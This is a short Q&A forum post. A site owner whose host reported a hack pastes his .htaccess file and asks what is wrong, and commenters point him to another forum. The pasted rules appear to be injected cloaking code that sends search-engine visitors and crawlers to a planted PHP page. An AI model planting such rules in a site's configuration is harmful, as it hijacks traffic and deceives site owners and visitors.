# Solving corruption in a .htaccess flle

Tags: .htaccess

I received a call from Go Daddy indicating that my site had been hacked and the .htaccess file is now an issue.

The code in my .htaccess file is as follows

```
RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /help-insideit.php?p=$1 [L]

AddType application/octet-stream .gdb .gpx
```

Could someone advise me as to what could be corrupted?

Thanks

Howard

Comment: I think you'd be better off asking this question over at [Webmasters.SE](http://webmasters.stackexchange.com). This is off-topic for SO and you would find more help over there.

Comment: Thank you very much for your assistance.  I will try in the other thread.